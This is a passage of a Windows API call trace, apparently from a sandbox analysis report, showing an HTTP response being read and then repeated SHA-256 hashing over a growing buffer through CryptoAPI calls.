	[0225.977] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x127c2c, lpdwBufferLength=0x127c28, lpdwIndex=0x0 | out: lpBuffer=0x127c2c*, lpdwBufferLength=0x127c28*=0x4, lpdwIndex=0x0) returned 1
	[0225.977] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127c30 | out: lpdwNumberOfBytesAvailable=0x127c30*=0x3a0) returned 1
	[0225.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x3a0) returned 0x26b8780
	[0225.977] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x26b8780, dwNumberOfBytesToRead=0x3a0, lpdwNumberOfBytesRead=0x127c28 | out: lpBuffer=0x26b8780*, lpdwNumberOfBytesRead=0x127c28*=0x3a0) returned 1
	[0225.978] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x127c30 | out: lpdwNumberOfBytesAvailable=0x127c30*=0x0) returned 1
	[0225.978] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307988) returned 1
	[0225.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2761c48
	[0225.978] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.979] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.979] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0225.979] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307988
	[0225.979] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2307988, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2307988, pdwDataLen=0x1284a8) returned 1
	[0225.979] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.979] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.979] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.980] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.980] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0225.980] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307a00
	[0225.981] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2307a00, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2307a00, pdwDataLen=0x1284a8) returned 1
	[0225.981] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.981] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.981] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.981] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.981] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0225.981] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307a28
	[0225.981] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2307a28, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2307a28, pdwDataLen=0x1284a8) returned 1
	[0225.981] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.981] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.981] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.982] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.982] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0225.982] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27780f0
	[0225.982] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27780f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27780f0, pdwDataLen=0x1284a8) returned 1
	[0225.982] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.982] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.982] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.982] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.982] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0225.982] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.982] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778028
	[0225.982] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2778028, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2778028, pdwDataLen=0x1284a8) returned 1
	[0225.982] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.982] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.982] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.983] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.983] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0225.983] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778078
	[0225.983] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2778078, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2778078, pdwDataLen=0x1284a8) returned 1
	[0225.983] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.983] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.983] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.983] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.983] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0225.983] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.983] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27781b8
	[0225.983] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x27781b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27781b8, pdwDataLen=0x1284a8) returned 1
	[0225.983] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.983] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.983] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.984] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.984] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0225.984] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778050
	[0225.984] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2778050, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2778050, pdwDataLen=0x1284a8) returned 1
	[0225.984] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.984] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.984] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.984] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.984] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0225.984] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27780a0
	[0225.984] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x27780a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27780a0, pdwDataLen=0x1284a8) returned 1
	[0225.984] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.984] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.984] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.985] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.985] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0225.985] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27780c8
	[0225.985] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27780c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27780c8, pdwDataLen=0x1284a8) returned 1
	[0225.985] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.985] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.985] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.985] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.985] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0225.985] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.985] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778140
	[0225.985] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2778140, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2778140, pdwDataLen=0x1284a8) returned 1
	[0225.985] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.985] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.985] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.986] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.986] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0225.986] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0225.986] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2777fb0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2777fb0, pdwDataLen=0x1284a8) returned 1
	[0225.986] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.986] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.986] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.986] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.986] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0225.986] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fd8
	[0225.986] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2777fd8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2777fd8, pdwDataLen=0x1284a8) returned 1
	[0225.986] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.986] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.987] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.987] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.987] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0225.987] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778000
	[0225.987] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2778000, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2778000, pdwDataLen=0x1284a8) returned 1
	[0225.987] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.987] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.987] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.987] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.987] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0225.987] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b5e8
	[0225.988] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b5e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b5e8, pdwDataLen=0x1284a8) returned 1
	[0225.988] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.988] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.988] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.988] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.988] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0225.988] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b610
	[0225.988] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b610, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b610, pdwDataLen=0x1284a8) returned 1
	[0225.988] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.988] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.988] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.989] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.989] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0225.989] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777e70
	[0225.989] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2777e70, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2777e70, pdwDataLen=0x1284a8) returned 1
	[0225.989] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.989] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.989] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.989] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.989] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0225.989] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777ec0
	[0225.989] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2777ec0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2777ec0, pdwDataLen=0x1284a8) returned 1
	[0225.989] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.989] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.989] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.990] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.990] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0225.990] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b638
	[0225.990] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b638, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b638, pdwDataLen=0x1284a8) returned 1
	[0225.990] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.990] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.990] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.990] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.990] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0225.990] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.990] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b660
	[0225.990] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b660, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b660, pdwDataLen=0x1284a8) returned 1
	[0225.990] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.990] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.990] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.991] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.991] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0225.991] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.991] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b688
	[0225.991] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b688, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b688, pdwDataLen=0x1284a8) returned 1
	[0225.991] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.991] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.991] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.991] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.991] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0225.991] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.991] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b6b0
	[0225.991] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x277b6b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b6b0, pdwDataLen=0x1284a8) returned 1
	[0225.991] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0225.991] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.991] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.992] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.992] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0225.992] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b6d8
	[0225.992] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x277b6d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x277b6d8, pdwDataLen=0x1284a8) returned 1
	[0225.992] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0225.992] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0225.992] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0225.992] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0225.992] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0225.992] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0225.992] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x277b700
